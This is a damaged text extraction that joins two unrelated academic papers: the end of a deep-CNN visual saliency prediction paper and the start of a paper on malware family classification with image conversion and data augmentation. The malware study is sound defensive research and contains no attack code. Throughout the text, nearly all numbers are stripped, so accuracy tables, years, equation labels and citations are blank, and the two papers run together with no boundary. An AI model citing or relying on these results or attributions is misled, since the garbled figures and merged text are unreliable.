gbvs model is the best in terms of the auc-borji metric. ghariba et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table runtime of the proposed model and ten visual saliency models. model training deep learning run time bms no no . s cas no no s gbvs no no s itti no no s mr-cnn yes yes s (gpu) salnet yes yes . s (gpu) edn yes yes s (gpu) aim yes no s judd model yes no s dva yes yes . s (gpu) proposed model yes yes s qualitative comparison of the proposed model with other advanced models the qualitative results obtained by the proposed model are compared with five state- of-the art models, itti, fes, covsal, gbvs, and sds-gm (li & mou, ), on the aforementioned datasets (i.e., toronto, mit , mit , and dut-omron). 
figure shows the visual saliency map results and the proposed model visual saliency prediction, i.e., generating saliency map, within the given images. based on the evaluation of the proposed model, the proposed model produces saliency maps comparable to other state-of-the-art models. ablation study in this work, we evaluated several different aspects of the proposed model’s architecture. table illustrates the results of the experiments conducted in this work. based on the architecture of the proposed model, we suggested different scenarios in order to find an optimum architecture. several conclusions were obtained based on these experiments: ( ) from scenarios s to s , we can see the best global accuracy is achieved with encoder- decoder stages (i.e., global accuracy was . % and loss function was . ). ( ) s describes the proposed model using convolutional modules & inception modules. this architecture also produced the best global accuracy (i.e., global accuracy was . %, and loss function was . ) compared to s and s , which contain one and two inception modules, respectively. ( ) s is the last scenario we selected as the entire model, including convolutional, inception, and residual module (i.e., fig. ). this scenario produced a higher global accuracy (i.e., global accuracy was . %, and loss function was . ) compare to those of scenarios s and s . conclusions a new deep cnn model has been proposed in this paper for predicting visual saliency in the field of view. the main novelty of this model is its use of a new deep learning ghariba et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure the saliency maps obtained from the proposed model and five other state-of-the-art models for a sample image from the toronto, mit , mit , and dut-omron datasets. full-size doi: . /peerjcs. /fig- ghariba et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. table different fcn models applied in this study. fcn models training validation scenarios description accuracy loss accuracy loss s convolutional modules . % . . % . s convolutional modules . % . . % . s convolutional modules . % . . % . s convolutional modules & . % . . % . s convolutional modules & inception modules . % . . % . s convolutional modules & inception modules . % . . % . s convolutional modules & inception modules . % . . % . s convolutional modules & residual modules . % . . % . s convolutional modules & residual modules . % . . % . s convolutional modules & residual modules . % . . % . s convolutional modules & inception module & residual module . % . . % . s convolutional modules & inception module & residual module . % . . % . s convolutional modules & inception module & residual module . % . . % . network with three encoders and three decoders (convolution and deconvolution) for visual saliency prediction, as well as its inclusion of two modules (inception and residual modules). the proposed model was trained from scratch and used the data augmentation technique to produce variations of images. the experiment results illustrate that the proposed model achieves superior performance relative to other state-of-the-art models. 
moreover, we discovered that an increase in the number of training images will increase the model prediction accuracy (i.e., improvement in model performance); however, the implementation of the model requires a large amount of memory and so it is difficult to use large numbers of training images. furthermore, because the model was trained from scratch, we expected the model will require more training data that other models, which are currently unavailable. a promising direction for future research is to collect a new dataset, generate its ground truth, and design new models with good performance and improved evaluation metrics based on the one proposed herein. extending the proposed model and applying it to examples of dynamic saliency (i.e., video images), is another plausible and interesting avenue of research. the proposed model may also facilitate other tasks, such as scene classification, salient object detection, and object detection, making it applicable in a number of disciplines. importantly, future models based on that proposed herein should be able to learn from high-level understanding, so they are able to, for example, detect the most important object of the image (e.g., focusing on the most important person in the room). saliency models also need to understand high-level semantics in the visual scene (i.e., semantic gap), and cognitive attention studies can help to overcome some of the restrictions identified in the proposed model. ghariba et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. additional information and declarations funding bashir muftah ghariba received financial support from the libyan ministry of higher education and scientific research, and elmergib university, alkhums, for the phd program. memorial university of newfoundland supported the publication fee. the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: libyan ministry of higher education and scientific research. elmergib university, alkhums. memorial university of newfoundland. competing interests the authors declare there are no competing interests. author contributions • bashir muftah ghariba conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. • mohamed s shehata conceived and designed the experiments, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. • peter mcguire conceived and designed the experiments, prepared figures and/or tables, and approved the final draft. data availability the following information was supplied regarding data availability: the raw data and code are available at: - bylinskii et al., ( ): ‘‘mit saliency benchmark’’. mit. dataset. http://saliency.mit. edu/results_mit .html. - ghariba, shehata & mcguire ( ): ‘‘saliency-_model_- ’’. github. code. https://github.com/bashir /saliency-_model_- . references borji a, itti l. . state-of-the-art in visual attention modeling. ieee transactions on pattern analysis and machine intelligence : – . borji a, tavakoli hr, sihite dn, itti l. . analysis of scores, datasets, and models in visual saliency prediction. in: proceedings of the ieee international conference on computer vision. piscataway: ieee, – . 
bruce nd, catton c, janjic s. . a deeper look at saliency: feature contrast, seman- tics, and beyond. in: proceedings of the ieee conference on computer vision and pattern recognition. piscataway: ieee, – . ghariba et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://saliency.mit.edu/results_mit .html http://saliency.mit.edu/results_mit .html https://github.com/bashir /saliency-_model_- http://dx.doi.org/ . /peerj-cs. bruce n, tsotsos j. . saliency based on information maximization. in: advances in neural information processing systems. cambridge: mit press, – . bylinskii z, judd t, oliva a, torralba a, durand f. . what do different evaluation metrics tell us about saliency models? ieee transactions on pattern analysis and machine intelligence : – . cheng g, han j, guo l, liu z, bu s, ren j. . effective and efficient midlevel visual elements-oriented land-use classification using vhr remote sensing images. ieee transactions on geoscience and remote sensing : – doi . /tgrs. . . cornia m, baraldi l, serra g, cucchiara r. . a deep multi-level network for saliency prediction. in: rd international conference on pattern recognition (icpr). piscataway: ieee, – . deng j, dong w, socher r, li l-j, li k, fei-fei l. . imagenet: a large-scale hier- archical image database. in: ieee conference on computer vision and pattern recognition. ieee, – . fang s, li j, tian y, huang t, chen x. . learning discriminative subspaces on random contrasts for image saliency analysis. ieee transactions on neural networks and learning systems : – . fu k, gong c, gu iy-h, yang j. . normalized cut-based saliency detection by adaptive multi-level region merging. ieee transactions on image processing : – doi . /tip. . . gao d, han s, vasconcelos n. . discriminant saliency, the detection of suspicious coincidences, and applications to visual recognition. ieee transactions on pattern analysis and machine intelligence : – doi . /tpami. . . gao d, mahadevan v, vasconcelos n. . the discriminant center–surround hypothesis for bottom-up saliency. in: advances in neural information processing systems. – . gao d, vasconcelos n. . discriminant saliency for visual recognition from cluttered scenes. in: advances in neural information processing systems. – . ghariba b, shehata ms, mcguire p. . visual saliency prediction based on deep learning. information : doi . /info . girshick r, donahue j, darrell t, malik j. . rich feature hierarchies for accurate object detection and semantic segmentation. in: proceedings of the ieee conference on computer vision and pattern recognition. piscataway: ieee, – . goferman s, zelnik-manor l, tal a. . context-aware saliency detection. ieee transactions on pattern analysis and machine intelligence. – . gong c, tao d, liu w, maybank sj, fang m, fu k, yang j. . saliency propagation from simple to difficult. in: proceedings of the ieee conference on computer vision and pattern recognition. – . guo f, wang w, shen j, shao l, yang j, tao d, tang yy. . video saliency detection using object proposals. ieee transactions on cybernetics : – . harel j, koch c, perona p. . graph-based visual saliency. in: advances in neural information processing systems. cambridge: mit press, – . ghariba et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /tgrs. . http://dx.doi.org/ . /tip. . http://dx.doi.org/ . /tpami. . http://dx.doi.org/ . /info http://dx.doi.org/ . /peerj-cs. huang j, yang x, fang x, lin w, zhang r. . 
integrating visual saliency and consistency for re-ranking image search results. ieee transactions on multimedia : – doi . /tmm. . . huang x, shen c, boix x, zhao q. . salicon: reducing the semantic gap in saliency prediction by adapting deep neural networks. in: proceedings of the ieee interna- tional conference on computer vision. piscataway: ieee, – . itti l, koch c, niebur e. . a model of saliency-based visual attention for rapid scene analysis. ieee transactions on pattern analysis and machine intelligence : – doi . / . . jetley s, murray n, vig e. . end-to-end saliency mapping via probability distribu- tion prediction. in: proceedings of the ieee conference on computer vision and pattern recognition. – . jiang m, huang s, duan j, zhao q. . salicon: saliency in context. in: proceedings of the ieee conference on computer vision and pattern recognition. piscataway: ieee, – . judd t, durand f, torralba a. . a benchmark of computational models of saliency to predict human fixations. in: mit technical report. mit-csail-tr- - . cambridge: mit. judd t, ehinger k, durand f, torralba a. . learning to predict where humans look. in: ieee th international conference on computer vision. piscataway: ieee, – . kanan c, tong mh, zhang l, cottrell gw. . sun: top-down saliency using natural statistics. visual cognition : – doi . / . karami e, shehata ms, smith a. . adaptive polar active contour for segmentation and tracking in ultrasound videos. ieee transactions on circuits and systems for video technology : – . krizhevsky a, sutskever i, hinton ge. . imagenet classification with deep con- volutional neural networks. in: advances in neural information processing systems. cambridge: mit press, – . kruthiventi ss, ayush k, babu rv. . deepfix: a fully convolutional neural net- work for predicting human eye fixations. ieee transactions on image processing : – doi . /tip. . . kruthiventi ss, gudisa v, dholakiya jh, venkatesh babu r. . saliency unified: a deep architecture for simultaneous eye fixation prediction and salient object segmentation. in: proceedings of the ieee conference on computer vision and pattern recognition. piscataway: ieee, – . kümmerer m, theis l, bethge m. . deep gaze i: boosting saliency prediction with feature maps trained on imagenet. arxiv preprint. arxiv: . kümmerer m, wallis ts, bethge m. . deepgaze ii: reading fixations from deep features trained on object recognition. arxiv preprint. arxiv: . kümmerer m, wallis ts, gatys la, bethge m. . understanding low-and high- level contributions to fixation prediction. in: proceedings of the ieee international conference on computer vision. piscataway: ieee, – . ghariba et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /tmm. . http://dx.doi.org/ . / . http://dx.doi.org/ . / http://dx.doi.org/ . /tip. . http://arxiv.org/abs/ http://arxiv.org/abs/ http://dx.doi.org/ . /peerj-cs. le meur o, le callet p, barba d, thoreau d. . a coherent computational approach to model bottom-up visual attention. ieee transactions on pattern analysis and machine intelligence : – doi . /tpami. . . li y, hou x, koch c, rehg jm, yuille al. . the secrets of salient object segmenta- tion. in: proceedings of the ieee conference on computer vision and pattern recognition. piscataway: ieee, – . li y, mou x. . saliency detection based on structural dissimilarity induced by image quality assessment model. journal of electronic imaging : . lin t-y, maire m, belongie s, hays j, perona p, ramanan d, dollár p, zitnick cl. . 
microsoft coco: common objects in context. in: european conference on computer vision. piscataway: ieee, – . liu n, han j. . dhsnet: deep hierarchical saliency network for salient object detection. in: proceedings of the ieee conference on computer vision and pattern recognition. piscataway: ieee, – . liu n, han j, liu t, li x. . learning to predict eye fixations via multiresolution convolutional neural networks. ieee transactions on neural networks and learning systems : – . liu z, zhang x, luo s, le meur o. a. superpixel-based spatiotemporal saliency detection. ieee transactions on circuits and systems for video technology : – doi . /tcsvt. . . liu z, zou w, meur ole. b. saliency tree: a novel saliency detection framework. ieee transactions on image processing : – doi . /tip. . . long j, shelhamer e, darrell t. . fully convolutional networks for semantic segmentation. in: proceedings of the ieee conference on computer vision and pattern recognition. piscataway: ieee, – . lu x, li x. . multiresolution imaging. ieee transactions on cybernetics : – . lu x, li x, mou l. . semi-supervised multitask learning for scene recognition. ieee transactions on cybernetics : – . mackenzie ak, harris jm. . a link between attentional function, effective eye move- ments, and driving ability. journal of experimental psychology: human perception and performance : . mahadevan v, vasconcelos n. . saliency-based discriminant tracking. in: ieee conference on computer vision and pattern recognition. piscataway: ieee, – . mahdianpari m, salehi b, rezaee m, mohammadimanesh f, zhang y. . very deep convolutional neural networks for complex land cover mapping using multispectral remote sensing imagery. remote sensing : doi . /rs . pan j, sayrol e, giro-i nieto x, mcguinness k, o’connor ne. . shallow and deep convolutional networks for saliency prediction. in: proceedings of the ieee conference on computer vision and pattern recognition. piscataway: ieee, – . riche n, duvinage m, mancas m, gosselin b, dutoit t. . saliency and human fixations: state-of-the-art and study of comparison metrics. in: proceedings of the ieee international conference on computer vision. piscataway: ieee, – . ghariba et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /tpami. . http://dx.doi.org/ . /tcsvt. . http://dx.doi.org/ . /tip. . http://dx.doi.org/ . /rs http://dx.doi.org/ . /peerj-cs. simonyan k, zisserman a. . very deep convolutional networks for large-scale image recognition. arxiv preprint. arxiv: . szegedy c, liu w, jia y, sermanet p, reed s, anguelov d, erhan d, vanhoucke v, rabinovich a. . going deeper with convolutions. in: proceedings of the ieee conference on computer vision and pattern recognition. piscataway: ieee, – . vig e, dorr m, cox d. . large-scale optimization of hierarchical features for saliency prediction in natural images. in: proceedings of the ieee conference on computer vision and pattern recognition. piscataway: ieee, – . wang w, shen j. . deep visual attention prediction. ieee transactions on image processing : – . wang w, shen j, dong x, borji a, yang r. a. inferring salient objects from human fixations. in: ieee transactions on pattern analysis and machine intelligence. piscataway: ieee. wang w, shen j, shao l. a. video salient object detection via fully convolutional networks. ieee transactions on image processing : – . wang w, shen j, shao l, porikli f. . correspondence driven saliency transfer. ieee transactions on image processing : – doi . /tip. . . 
wang w, shen j, xie j, cheng m-m, ling h, borji a. b. revisiting video saliency prediction in the deep learning era. in: ieee transactions on pattern analysis and machine intelligence. piscataway: ieee. wang w, shen j, yang r, porikli f. b. saliency-aware video object segmentation. : – . yang c, zhang l, lu h, ruan x, yang m-h. . saliency detection via graph-based manifold ranking. in: proceedings of the ieee conference on computer vision and pattern recognition. piscataway: ieee, – . yao x, han j, cheng g, qian x, guo l. . semantic annotation of high-resolution satellite images via weakly supervised learning. ieee transactions on geoscience and remote sensing : – doi . /tgrs. . . ghariba et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://arxiv.org/abs/ http://dx.doi.org/ . /tip. . http://dx.doi.org/ . /tgrs. . http://dx.doi.org/ . /peerj-cs. data augmentation based malware detection using convolutional neural networks data augmentation based malware detection using convolutional neural networks ferhat ozgur catak , javed ahmed , kevser sahinbas and zahid hussain khand simula research laboratory, fornebu, norway center of excellence for robotics, artificial intelligence and blockchain (craib), department of computer science, sukkur iba university, sukkur, pakistan department of management information system, istanbul medipol university, istanbul, turkey department of computer science, sukkur iba university, sukkur, pakistan abstract due to advancements in malware competencies, cyber-attacks have been broadly observed in the digital world. cyber-attacks can hit an organization hard by causing several damages such as data breach, financial loss, and reputation loss. some of the most prominent examples of ransomware attacks in history are wannacry and petya, which impacted companies’ finances throughout the globe. both wannacry and petya caused operational processes inoperable by targeting critical infrastructure. it is quite impossible for anti-virus applications using traditional signature-based methods to detect this type of malware because they have different characteristics on each contaminated computer. the most important feature of this type of malware is that they change their contents using their mutation engines to create another hash representation of the executable file as they propagate from one computer to another. to overcome this method that attackers use to camouflage malware, we have created three-channel image files of malicious software. attackers make different variants of the same software because they modify the contents of the malware. in the solution to this problem, we created variants of the images by applying data augmentation methods. this article aims to provide an image augmentation enhanced deep convolutional neural network (cnn) models for detecting malware families in a metamorphic malware environment. the main contributions of the article consist of three components, including image generation from malware samples, image augmentation, and the last one is classifying the malware families by using a cnn model. in the first component, the collected malware samples are converted into binary file to -channel images using the windowing technique. the second component of the system create the augmented version of the images, and the last part builds a classification model. this study uses five different deep cnn model for malware family detection. 
the results obtained by the classifier demonstrate accuracy up to %, which is quite satisfactory. subjects artificial intelligence, security and privacy keywords convolutional neural networks, cybersecurity, image augmentation, malware analysis introduction recently our usage of technical gadgets has increased due to the aggressive invasion of technology in our daily life. the frequency of use for many devices has increased many how to cite this article catak fo, ahmed j, sahinbas k, khand zh. . data augmentation based malware detection using convolutional neural networks. peerj comput. sci. :e doi . /peerj-cs. submitted september accepted december published january corresponding author ferhat ozgur catak, ozgur@simula.no academic editor robertas damaševičius additional information and declarations can be found on page doi . /peerj-cs. copyright catak et al. distributed under creative commons cc-by . http://dx.doi.org/ . /peerj-cs. mailto:ozgur@�simula.�no https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://www.creativecommons.org/licenses/by/ . / http://www.creativecommons.org/licenses/by/ . / https://peerj.com/computer-science/ folds, including mobile phones, laptops, webcams, etc. motivated by market demand, the manufacturers have started to produce devices with attractive features ignoring the security weakness caused by offering such features. due to the fierce competition among the manufacturers and rapid product development, many products are released to the market with security weaknesses. this offers many opportunities for malicious software developers. malicious software, commonly known as malware, is intentionally designed to damage computer systems and exploit security weaknesses. malware is designed for a specific target, often attempting to camouflage itself in another way, with intentions such as file encryption, ransom, preventing a system from working, gaining unauthorized access to a network, data theft, or sabotage. malware targets various platforms such as servers, personal computers, mobile phones, and cameras to disrupt the system’s normal function. malware development has become a serious activity lately, and in the only first quarter of , around . million new malware has been found (https://www. av-test.org/en/statistics/malware/). malware has acquired advanced competencies and diversity in features, which significantly raises the importance of cybersecurity. cybersecurity activities in various organizations have increased (shamshirband et al., ; shamshirband & chronopoulos, ) due to its vital importance to the aforementioned problem. one of the essential cybersecurity activities is malware analysis. in order to be effectively protected from malware, the first thing to do is to recognize the malicious software and analyze their behavior well. in this respect, the critical point is to identify malicious software and classify them successfully. a family of malicious software also represents the malicious behavior to which it belongs. as a result, the countermeasures to be taken against these behaviors may vary according to malicious software families. several consecutive operations are generally performed within malware analysis. this task is mainly done using static and dynamic analysis methods, including the strings command to get the malicious ip addresses, entropy value if the suspicious executable file, executing the file in an isolated environment to record its behaviour. 
figure provides the new malicious programs number detected per year from to . in the period of and , the number of new threats has increased significantly due to an increase in the power of antivirus centers processing threats and the evolution in file-infecting technologies. in almost the same number of new malicious programs was detected as approximately million (https://securelist.com/ kaspersky-security-bulletin- -malware-evolution- / /). in , malware evolution has been almost identical to the previous one (https://securelist.com/kaspersky- security-bulletin-malware-evolution- / /). figure presents the number of new malware identified per year from to . it is observed a noticeable increase in the number of new malicious programs year by year. overall, malware activity has increased from to . malware developers, on the other hand, develop a variety of anti-analysis techniques with their broad knowledge of existing analysis methods. anti-debugging and anti- disassembly techniques are the two methods most commonly used by malware developers. such methods to bypass analysis are generally used to produce erroneous results by the catak et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://www.av-test.org/en/statistics/malware/ https://www.av-test.org/en/statistics/malware/ https://securelist.com/kaspersky-security-bulletin- -malware-evolution- / / https://securelist.com/kaspersky-security-bulletin- -malware-evolution- / / https://securelist.com/kaspersky-security-bulletin-malware-evolution- / / https://securelist.com/kaspersky-security-bulletin-malware-evolution- / / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ disassembler and debugger tools. in anti-debugging methods, malware developers often manipulate pointer address parameters used by jump op-code such as jz, jnz, jze. anti-debugging techniques are used by the developers to ensure that malware samples do not run under a debugger, and in that case, change the execution flow accordingly. in most cases, the reverse engineering process will be slow down by the anti-debugging technique. figure number of new malicious programs identified per year from – . full-size doi: . /peerj-cs. /fig- figure number of new malicious programs identified per year from – . full-size doi: . /peerj-cs. /fig- catak et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ the automated malware detection systems used these days do not yield very successful results due to the aforementioned reasons. proper malware labeling is a challenging issue in this domain. an anti-virus application can detect malware as a trojan, whereas the same malware is labeled as a worm by another anti-virus application. it has become even more complicated with the advent of sophisticated malware. with the development of machine learning, it has been observed that these techniques are being used in the field of malware analysis. to use api calls as the feature vector is one of the first usages of machine learning algorithms for malicious software analysis (mira, ). n-grams are other commonly used methods for the quantification of api calls. the main reasons for using n-grams are to reduce computation-complexity of the model, to create a simple term-frequency × inverse-document-frequency (tf-idf) matrix, and to use traditional algorithms such as random forests, decision tree, and support vector machine (svm). 
although such an approach has produced high classification performance results, they remain inadequate for the current malware infection methods. malware analysts need sandbox applications to create api call datasets because a sandbox provides an isolated virtual machine (vm) with a secure and close network environment. the behaviour of malicious software runing in the vm are recorded. however, malware developers use anti-vm and anti-sandbox methods that integrate various virtual machine detection code snippets into their malicious code blocks. if the malicious software gets the impression of executing on a virtual machine or sandbox environment, then it changes its behaviour to complicate the analysis. the most widely used anti-vm and anti-sandbox methods are “checking cpuid instruction”, “vmware magic number”, “checking for known mac addresses”, “checking for processes indicating a vm”, “checking for existence of files indicating a vm” and “checking for running services”. although malware changes its behaviour and blocks dynamic analysis, some machine learning methods can be used to obtain malware families depending on the malware code. currently, the approach used for malware analysis is based on creating a grayscale image from malware code and then using classification algorithms. we created classification models by extracting only the behaviour of malware samples in our previous works (catak & yazı, ; yazı, catak & gul, ; catak et al., ). we executed all the malware samples in the cuckoo sandbox environment. whereas, in this study, harmful software did not operate in an isolated sandbox environment. this research’s main contribution is to develop a data augmentation enhanced malware family classification model that exploits augmentation for malware variants and takes advantage of a convolutional neural network (cnn) to improve image classification. herein, we demonstrate that the data augmentation-based -channel image classification can significantly influence malware family classification performance. malware developers use different methods to camouflage the malicious behaviour of malware while executing. there is no real execution phase in an operating system in our approach. another technique that malware developers apply is to put various modifications (such as noise) to the content when they propagate from one computer to another. catak et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ we used data augmentation methods to solve this camouflage technique to our malware image samples to detect their variants. the rest of the article is organized as follows: “related work” briefly describes the related work. in “system model”, we present the system model and consists of two subsections. the first subsection presents the image conversion, and the second subsection presents the data augmentation. “proposed approach” provides fine-grained details of the proposed approach and presents the malware classification algorithm. “experiments” provides an extensive analysis of results. finally, in “conclusion and future work”, we conclude the article and present some future research directions. related work malware analysis field has gained considerable attention from research community with rapid development of various techniques for malware detection. there is huge research literature in this area. 
since the proposed work is related to image-based analysis using deep learning techniques, the relevant research literature regarding image processing techniques for malware detection are briefly discussed in this section. one of the early studies conducted on malware images was done by nataraj et al. ( ). the authors proposed an image texture analysis-based technique for visualization and classification of different families of malware. this approach converts malware binaries into grayscale images. malware are classified using k-nearest neighbor technique with euclidean method. however, the system requires pre-processing of filtering to extract the image texture as features for classification. on the other hand, to extract the image texture as features for classification, the system requires pre-processing of filtering. kancherla & mukkamala ( ) proposed a low-level texture feature extraction technique for malware analysis parallel to nataraj’s technique. the authors converted malware binaries into images and then extracted discrete wavelets transform based texture features for classification. makandar & patrot ( ) identify new malware and their variants to extract wavelet transforms-based texture features, and then supply to feed forward artificial neural network for applying classification. kosmidis & kalloniatis ( ) described a two-step malware variant detection and classification method. in the first step, binary texture analysis applied through gist. in the second step, these texture features classified by using machine- learning techniques such as classification and clustering to identify malware. although the works mentioned above nataraj et al., ; kancherla & mukkamala, ; makandar & patrot, ; kosmidis & kalloniatis ( ) are helpful to detect and classify new malware and their variants, they still have some limitations. for instance, on the one hand, global texture features lose local information needed for classification. on the another hand, they have significant computation overheads to process a vast amount of malware. according to zhang et al. ( ), the malware classification problem can be converted into an image classification problem. their study provides to disassembles executable files into opcode sequences and then convert opcode into images for identifying whether the source file is benign or malware by using cnn. yue ( ) presents multifamily catak et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ malware classification approach by applying cnn. however, the performance is degraded due to the imbalance of malware families. the author proposes softmax loss function to mitigate this issue. this approach is reactive in nature to deal with scenarios where class imbalance is assumed. the other work by ni, qian & zhang ( ) propose a method for malware classification by applying deep learning techniques. their algorithm uses simhash and cnn techniques for malware classification. the algorithm converts the malware codes that is disassembled into grayscale images used simhash algorithm and after that uses cnn to identify their family. the performance improvement is ensured by using some methods such as bilinear interpolation, multi-hash and major block selection during the process. cui et al. ( ) propose a method that applies cnn with the bat algorithm together in order to robust the accuracy of the model. their implemented method converts the malicious code into grayscale images. 
the method’s images are classified by using a cnn and bat algorithm is used to address the issue of data imbalance among different malware families. the main limitation of this approach is that they used one evaluation criterion to test the model. the other work by nisa et al. ( ) suggest a new approach using malware images with rotate, flip and scale base image augmentation techniques. two stage deep learning neural network is used by tobiyama et al. ( ) for infection detection. initially, the authors generated an image via the extracted behavioral features from the trained recurrent neural network. later, to classify the feature images, they used cnn. an approach to derive more significant byte sequence in a malware was proposed by yakura et al. ( ). the authors used cnn with attention mechanism to achieve this for the images converted from binaries. malnet method for malware detection was proposed by yan, qi & rao ( ). the method automatically learns essential features from the raw data. the method generates grayscale images from opcode sequences. later, cnn and lstm are used to learn important features from the grayscale images. fu et al. ( ) proposed an approach to visualize malware as an rgb-colored image. malware classification is performed by merging global and local features using random forest, k-nearest neighbor, and support vector machine. the approach realizes fine-grained malware classification with low computational cost by utilizing the combination of global and local features. liu et al. ( ) proposed a malware classification framework based on a bag-of-visual-words (bovw) model to obtain robust feature descriptors of malware images. the model demonstrates better classification accuracy even for more challenging datasets. the major limitation of this approach is higher computational cost. chen et al. ( ) conducted an extensive study on the vulnerabilities of the cnn-based malware detectors. the authors proposed two methods to attack recently developed malware detectors. one of these methods achieve attack success rate over % which strongly demonstrates the vulnerability of cnn-based malware detectors. the authors also conducted experiments with pre-detection mechanism to reject adversarial examples and shown its effectiveness in improving the safety and efficiency of malware catak et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ detectors. venkatraman, alazab & vinayakumar ( ) used similarity mining and deep learning architecture to identify and classify obfuscated malware accurately. the authors used eight different similarity measures to generate similarity matrices and to identify malware family by adopting images of distance scores. the advantage of this approach is that it requires less computational cost as compared to classical machine learning based methods. dai et al. ( ) proposed a malware detection method using hardware features due to inherent deficiencies in software methods. the approach dumps the malware memory of runtime to binary files, then grayscale image is extracted from the binary files. a fixed size images are generated from the grayscale image and histogram of gradient is used to extract image features. finally, malware classification is done using the popular classifier algorithms. one of the limitations for this approach is that it cannot provide against fileless malware. gibert et al. ( ) propose a file agnostic deep learning approach for malware classification. 
the malicious software are grouped into families based on a set of discriminant patterns extracted from their visualization as images. yoo, kim & kang ( ) propose multiclass cnn model to classify exploit kits. on of the root of malware contamination are exploit kits. this type of attack has rapidly increased and detection rate is quite low. the authors proposed limited grayscale, size-based hybrid model and recursive image update method to enhance classification accuracy. traditional machine learning methods are applied in most of the existing state of the art. our study uses a deep learning method and differs from most other studies examined in this section. deep learning methods are not algorithmically new and easy to implement. they can be trained with high-performance computations on systems such as gpus. today, they have become prevalent in the field of machine learning. some of the studies examined also used deep learning methods, but our approach differs from these studies because we used five different deep cnn models for malware family classification. it is evident from the results that -channel image classification can significantly influence malware family detection’s performance. the main contribution that makes this study stand out regarding the existing state of art examined in this section is applying data augmentation enhanced malware family classification model. this model exploits augmentation for variants of malware clones and take advantage of cnn to improve image classification. system model the system architecture of the proposed model is composed into three different components. the first component is image conversion of malware samples using decimal representation and entropy values of each byte. the second component is image augmentation component. the last one is cnn based malware family classification. image conversion we used our publicly available malware dataset for this approach (https://github.com/ ocatak/malware_api_class. malware samples collected from github platform, in the first catak et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://github.com/ocatak/malware_api_class https://github.com/ocatak/malware_api_class http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ step, are labeled using clamav open source command-line antivirus software. the model architecture is illustrated in fig. . every malware sample is split into their bytes. in the second step, each byte is converted from bit representations to decimal representation for the red channel. for instance, the byte representation with is converted to as the decimal representation. in the third step, we calculated the entropy value of the byte representations. as an example of the same byte value of , the entropy value is . the input of the first component of the malware detection system is a collection of malware stored in different formats such as portable executable, word, pdf. these malware are then converted into -channels png files as shown in fig. . 
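the byte-to-pixel conversion just described (red channel: decimal value of each byte; green channel: an entropy value for that byte; blue channel: zeros) can be sketched as follows. the image width, the exact entropy windowing, and the scaling of the entropy channel are not fully legible in this copy, so the 256-pixel width, the small sliding window, and the [0, 255] scaling below are assumptions.

import math
import numpy as np
from collections import Counter
from PIL import Image

def window_entropy(data: bytes) -> float:
    # shannon entropy (in bits) of a short byte window
    counts = Counter(data)
    total = len(data)
    return -sum((c / total) * math.log2(c / total) for c in counts.values())

def malware_to_image(path: str, width: int = 256, window: int = 16) -> Image.Image:
    payload = open(path, "rb").read()
    height = math.ceil(len(payload) / width)
    rgb = np.zeros((height, width, 3), dtype=np.uint8)
    for k, byte in enumerate(payload):
        i, j = divmod(k, width)
        rgb[i, j, 0] = byte                                  # red: decimal value of the byte
        ent = window_entropy(payload[k:k + window])
        rgb[i, j, 1] = int(ent / 8.0 * 255)                  # green: entropy scaled to [0, 255]
        # blue channel stays zero
    return Image.fromarray(rgb, mode="RGB")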
figure : the architecture of the proposed -channel image representation of malware samples (e.g., trojan.killav, win.malware.zusy, win /expiro). given input malware samples, rgb representations are computed as explained in "basic idea": the red channel holds the decimal value of each byte, the green channel holds the entropy value of each byte, and the blue channel is a zero channel.

figure shows an example pixel generation process.

figure : example process of pixel generation from the opcode.

each byte value of the executable file is converted to its decimal representation for the red channel, and the corresponding entropy value is assigned to the green channel.

data augmentation
the key problem with a malware detection model is data diversity. many alternative methods are available for solving this problem; one approach involves the use of data augmentation. data augmentation can be defined as a strategy to artificially increase the variety of input instances for the training phase, without really collecting new instances. additive noise is the most used data augmentation technique for building reliable machine learning models. gaussian, laplacian, and poisson noises are the most used techniques to enhance the input dataset. laplacian noise is eventually derived from white (gaussian) noise (hida & si, ). these are the most used additive noise techniques to improve and enhance image datasets (harmsen & pearlman, ; holmstrom & koistinen, ).

additive gaussian
additive gaussian noise is a fundamental noise model used in information theory to simulate the impact of many random processes that occur in nature (selesnick, ). the additive gaussian noise channel is represented by a series of outputs y_i at a discrete-time event index i. y_i is the sum of the input x_i and the noise z_i, where z_i is independent and identically distributed and drawn from a zero-mean normal distribution with variance N. the z_i are further assumed to not be correlated with the x_i:

z_i \sim \mathcal{N}(0, N), \qquad y_i = x_i + z_i    ( )

additive poisson
poisson noise is a kind of noise that can be represented by a poisson process (wojtkiewicz et al., ). a discrete random variable x is said to have a poisson distribution with parameter \lambda > 0 if, for k = 0, 1, 2, ..., the probability mass function of x is given by:

